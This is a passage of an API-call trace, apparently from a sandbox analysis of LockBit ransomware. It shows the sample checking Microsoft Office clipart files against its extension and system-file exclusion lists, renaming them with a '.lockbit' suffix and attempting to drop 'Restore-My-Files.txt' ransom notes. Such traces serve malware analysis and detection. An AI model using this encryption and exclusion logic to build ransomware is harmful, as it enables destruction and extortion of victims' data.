lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0158.705] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309920.WMF.lockbit") returned 72 [0158.705] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309920.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309920.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0158.706] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0158.707] malloc (_Size=0x40068) returned 0x3df0008 [0158.707] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=11064) returned 1 [0158.707] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.707] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.707] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0158.707] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.708] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.708] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0158.708] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0158.714] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309920.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309920.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0158.714] malloc (_Size=0xa6) returned 0x1fa2ed8 [0158.714] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0158.715] free (_Block=0x1fa2ed8) [0158.715] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309920.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0158.715] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0158.716] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0158.716] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a03b100, ftCreationTime.dwHighDateTime=0x1c97bb5, ftLastAccessTime.dwLowDateTime=0x66188a70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9a03b100, ftLastWriteTime.dwHighDateTime=0x1c97bb5, nFileSizeHigh=0x0, nFileSizeLow=0x911a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0313896.JPG", cAlternateFileName="")) returned 1 [0158.716] lstrcmpiW (lpString1=".", lpString2="J0313896.JPG") returned -1 [0158.716] lstrcmpiW (lpString1="..", lpString2="J0313896.JPG") returned -1 [0158.716] PathFindExtensionW (pszPath="J0313896.JPG") returned=".JPG" [0158.716] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0158.716] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0158.716] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0158.716] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0158.716] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0158.716] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0158.716] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0158.716] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0158.716] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0158.716] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0158.716] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0158.716] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0158.716] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0158.716] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0158.716] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0158.716] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0158.716] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0158.716] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0158.717] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0158.717] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0158.717] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0158.717] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0158.717] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0158.717] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0158.717] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0158.717] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0158.717] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0158.717] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0158.717] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0158.717] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0158.717] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0158.717] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0158.717] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0158.717] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0158.717] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0158.717] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0158.717] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0158.717] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0158.717] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0158.717] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0158.717] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0158.717] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0158.717] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0158.717] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0158.718] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0158.718] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0158.718] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0158.718] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0313896.JPG") returned 1 [0158.718] lstrcmpiW (lpString1="ntldr", lpString2="J0313896.JPG") returned 1 [0158.718] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0313896.JPG") returned 1 [0158.718] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0313896.JPG") returned -1 [0158.718] lstrcmpiW (lpString1="autorun.inf", lpString2="J0313896.JPG") returned -1 [0158.718] lstrcmpiW (lpString1="thumbs.db", lpString2="J0313896.JPG") returned 1 [0158.718] lstrcmpiW (lpString1="iconcache.db", lpString2="J0313896.JPG") returned -1 [0158.718] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0158.718] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313896.JPG") returned=".JPG" [0158.718] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0158.718] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0158.718] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0158.718] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0158.718] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0158.718] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0158.718] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0158.718] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0158.718] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0158.718] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0158.718] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0158.718] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0158.718] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0158.719] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0158.719] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0158.719] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0158.719] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0158.719] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0158.719] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0158.719] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0158.719] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0158.719] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0158.719] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0158.719] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0158.719] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0158.719] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0158.719] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0158.719] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0158.719] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313896.JPG.lockbit") returned 72 [0158.719] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313896.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0313896.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0158.721] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0158.721] malloc (_Size=0x40068) returned 0x3df0008 [0158.721] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=37146) returned 1 [0158.722] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.722] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.722] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0158.722] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.723] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0158.723] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0158.734] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313896.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313896.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0158.734] malloc (_Size=0xa6) returned 0x1fa2ed8 [0158.734] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0158.736] free (_Block=0x1fa2ed8) [0158.736] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313896.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0158.736] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0158.736] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0158.736] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x717bb700, ftCreationTime.dwHighDateTime=0x1c97bb5, ftLastAccessTime.dwLowDateTime=0x5674c1b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x717bb700, ftLastWriteTime.dwHighDateTime=0x1c97bb5, nFileSizeHigh=0x0, nFileSizeLow=0xa75a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0313965.JPG", cAlternateFileName="")) returned 1 [0158.736] lstrcmpiW (lpString1=".", lpString2="J0313965.JPG") returned -1 [0158.737] lstrcmpiW (lpString1="..", lpString2="J0313965.JPG") returned -1 [0158.737] PathFindExtensionW (pszPath="J0313965.JPG") returned=".JPG" [0158.737] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0158.737] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0158.737] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0158.737] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0158.737] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0158.737] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0158.737] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0158.737] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0158.737] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0158.737] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0158.737] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0158.737] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0158.737] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0158.737] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0158.737] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0158.737] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0158.737] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0158.737] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0158.737] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0158.737] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0158.737] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0158.737] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0158.738] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0158.738] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0158.738] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0158.738] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0158.738] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0158.738] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0158.738] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0158.738] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0158.738] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0158.738] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0158.738] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0158.738] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0158.738] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0158.738] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0158.738] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0158.738] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0158.738] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0158.738] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0158.738] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0158.738] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0158.738] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0158.738] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0158.738] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0158.738] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0158.739] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0158.739] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0313965.JPG") returned 1 [0158.739] lstrcmpiW (lpString1="ntldr", lpString2="J0313965.JPG") returned 1 [0158.739] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0313965.JPG") returned 1 [0158.739] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0313965.JPG") returned -1 [0158.739] lstrcmpiW (lpString1="autorun.inf", lpString2="J0313965.JPG") returned -1 [0158.739] lstrcmpiW (lpString1="thumbs.db", lpString2="J0313965.JPG") returned 1 [0158.739] lstrcmpiW (lpString1="iconcache.db", lpString2="J0313965.JPG") returned -1 [0158.739] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0158.739] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313965.JPG") returned=".JPG" [0158.739] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0158.739] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0158.739] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0158.739] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0158.739] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0158.739] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0158.739] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0158.739] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0158.739] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0158.739] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0158.739] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0158.739] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0158.739] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0158.740] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0158.740] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0158.740] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0158.740] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0158.740] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0158.740] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0158.740] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0158.740] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0158.740] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0158.740] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0158.740] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0158.740] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0158.740] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0158.740] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0158.740] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0158.740] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313965.JPG.lockbit") returned 72 [0158.741] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313965.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0313965.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0158.742] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0158.742] malloc (_Size=0x40068) returned 0x3df0008 [0158.742] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=42842) returned 1 [0158.742] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.743] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.743] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0158.743] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.743] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.743] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0158.743] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0158.749] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313965.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313965.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0158.749] malloc (_Size=0xa6) returned 0x1fa2ed8 [0158.749] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0158.750] free (_Block=0x1fa2ed8) [0158.750] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313965.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0158.750] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0158.750] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0158.750] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x527d2500, ftCreationTime.dwHighDateTime=0x1c97bb5, ftLastAccessTime.dwLowDateTime=0x66188a70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x527d2500, ftLastWriteTime.dwHighDateTime=0x1c97bb5, nFileSizeHigh=0x0, nFileSizeLow=0x81ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0313970.JPG", cAlternateFileName="")) returned 1 [0158.750] lstrcmpiW (lpString1=".", lpString2="J0313970.JPG") returned -1 [0158.750] lstrcmpiW (lpString1="..", lpString2="J0313970.JPG") returned -1 [0158.750] PathFindExtensionW (pszPath="J0313970.JPG") returned=".JPG" [0158.750] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0158.750] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0158.750] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0158.750] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0158.750] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0158.750] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0158.750] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0158.750] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0158.750] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0158.750] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0158.750] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0158.750] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0158.750] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0158.751] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0158.751] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0158.751] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0158.751] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0158.751] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0158.751] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0158.751] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0158.751] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0158.751] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0158.751] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0158.751] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0158.751] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0158.751] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0158.751] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0158.751] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0158.751] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0158.751] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0158.751] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0158.751] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0158.751] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 